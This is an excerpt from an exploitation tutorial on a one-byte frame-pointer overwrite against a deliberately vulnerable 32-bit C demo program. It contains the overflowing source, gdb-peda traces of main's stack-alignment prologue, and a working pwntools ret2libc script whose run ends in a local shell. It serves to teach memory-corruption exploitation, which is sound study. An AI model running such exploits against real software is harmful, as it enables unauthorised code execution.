...
//gcc -m32 -fno-stack-protector -o fpo_alignment fpo_alignment.c -ldl
/*
 * Deliberately vulnerable demo program for the frame-pointer-overwrite
 * walkthrough. It is built 32-bit with the stack protector disabled, so no
 * canary sits between buf and the saved registers to detect an overflow;
 * -ldl is needed for dlsym().
 */
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <dlfcn.h>
#include <stdlib.h>

/*
 * Prints the address of its own stack buffer and of libc's printf (the
 * accompanying script uses both to locate the stack and libc at run time),
 * then reads up to 63 bytes into a 50-byte buffer: the last 13 bytes run
 * past buf into the saved registers of this frame.
 * The real fix is read(0, buf, sizeof buf - 1) and not printing addresses.
 */
void vuln(){
    char buf[50];
    printf("buf[50] address : %p\n",buf);
    /* RTLD_NEXT resolves the next "printf" after this object, i.e. libc's. */
    void (*printf_addr)() = dlsym(RTLD_NEXT, "printf");
    printf("Printf() address : %p\n",printf_addr);
    read(0, buf, 63);   /* overflow: 63 > sizeof buf (50) */
}

/*
 * Exits unless at least one argument is given, otherwise calls vuln().
 * `void main` is non-standard; it should be `int main` returning 0.
 * gcc emits the 16-byte stack-alignment prologue/epilogue for main
 * (esp is restored from a saved ecx before ret), which is what the
 * disassembly below shows.
 */
void main(int argc, char *argv[]){
    if(argc<2){
        printf("argv error\n");
        exit(0);
    }
    vuln();
}
...
lazenca0x0@ubuntu:~/Exploit/FPO$ gdb -q ./fpo_alignment
Reading symbols from ./fpo_alignment...(no debugging symbols found)...done.
gdb-peda$ disassemble main
Dump of assembler code for function main:
   0x080485d3 <+0>:	lea ecx,[esp+0x4]
   0x080485d7 <+4>:	and esp,0xfffffff0
   0x080485da <+7>:	push DWORD PTR [ecx-0x4]
   0x080485dd <+10>:	push ebp
   0x080485de <+11>:	mov ebp,esp
   0x080485e0 <+13>:	push ecx
   0x080485e1 <+14>:	sub esp,0x4
   0x080485e4 <+17>:	mov eax,ecx
   0x080485e6 <+19>:	cmp DWORD PTR [eax],0x1
   0x080485e9 <+22>:	jg 0x8048605 <main+50>
   0x080485eb <+24>:	sub esp,0xc
   0x080485ee <+27>:	push 0x80486d4
   0x080485f3 <+32>:	call 0x8048430 <puts@plt>
   0x080485f8 <+37>:	add esp,0x10
   0x080485fb <+40>:	sub esp,0xc
   0x080485fe <+43>:	push 0x0
   0x08048600 <+45>:	call 0x8048440 <exit@plt>
   0x08048605 <+50>:	call 0x804857b <vuln>
   0x0804860a <+55>:	nop
   0x0804860b <+56>:	mov ecx,DWORD PTR [ebp-0x4]
   0x0804860e <+59>:	leave
   0x0804860f <+60>:	lea esp,[ecx-0x4]
   0x08048612 <+63>:	ret
End of assembler dump.
gdb-peda$ b *0x080485d3
Breakpoint 1 at 0x80485d3
gdb-peda$
...
gdb-peda$ r AAAA
Starting program: /home/lazenca0x0/Exploit/FPO/fpo_aligned AAAA
Breakpoint 1, 0x080485d3 in main ()
gdb-peda$ i r esp
esp 0xffffd59c 0xffffd59c
gdb-peda$ p/x 0xffffd59c + 0x4
$1 = 0xffffd5a0
gdb-peda$ ni
0x080485d7 in main ()
gdb-peda$ i r esp
esp 0xffffd59c 0xffffd59c
gdb-peda$ p/x 0xffffd59c & 0xfffffff0
$2 = 0xffffd590
gdb-peda$ ni
0x080485da in main ()
gdb-peda$ i r esp
esp 0xffffd590 0xffffd590
gdb-peda$ i r ecx
ecx 0xffffd5a0 0xffffd5a0
gdb-peda$ x/wx 0xffffd5a0 - 0x4
0xffffd59c: 0xf7e18637
gdb-peda$ x/i 0xf7e18637
0xf7e18637 <__libc_start_main+247>: add esp,0x10
gdb-peda$
...
# Python 2 pwntools script (print statements, str payloads); run it with
# python2 or port the string handling to bytes for Python 3.
from pwn import *
# main() exits unless argc >= 2, so a dummy argument is passed.
p = process(['./fpo_aligned','AAAA'])
# First leak: "buf[50] address : 0x........" -- ten characters including the 0x prefix.
p.recvuntil('buf[50] address : ')
tmp = p.recv(10)
stackAddr = int(tmp,16)
stackAddr += 0x8
# tmp[8:11] is the last two hex digits, i.e. the low byte of buf's address;
# +4 is the single byte that ends up over the saved frame pointer below.
onebyte = int(tmp[8:11],16)
onebyte += 0x4
# Second leak: libc's printf, from which libc's base and the other addresses are derived.
p.recvuntil('Printf() address : ')
libc = p.recvuntil('\n')
libc = int(libc,16)
# These offsets are specific to the author's libc build and must be
# recomputed for any other libc version.
libcBase = libc - 0x49020
sysAddr = libcBase + 0x3a940
exit = libcBase + 0x2e7b0      # shadows Python's builtin exit(); harmless here
binsh = libcBase + 0x15902b
print "StackAddr : " + hex(stackAddr)
print "onebyte : " + hex(onebyte)
print "libc base : " + hex(libcBase)
print "system() : " +hex(sysAddr)
print "exit() : " +hex(exit)
print "binsh : " + hex(binsh)
# Payload placed inside buf: four 4-byte values padded with NOPs to 62 bytes.
# vuln() reads only 63 bytes, so just the first byte of p32(onebyte) is
# accepted -- the partial overwrite of the saved frame pointer this page is
# about. A stack canary between buf and the saved ebp would catch it.
exploit = p32(stackAddr)
exploit += p32(sysAddr)
exploit += p32(exit)
exploit += p32(binsh)
exploit += '\x90' * (62 - len(exploit))
exploit += p32(onebyte)
p.send(exploit)
p.interactive()
lazenca0x0@ubuntu:~/Exploit/FPO$ python Exploit.py
[+] Starting local process './fpo_aligned': pid 4830
StackAddr : 0xffc98542
onebyte : 0x3e
libc base : 0xf7d8d000
system() : 0xf7dc7940
exit() : 0xf7dbb7b0
binsh : 0xf7ee602b
[*] Switching to interactive mode
$ id
uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
$
...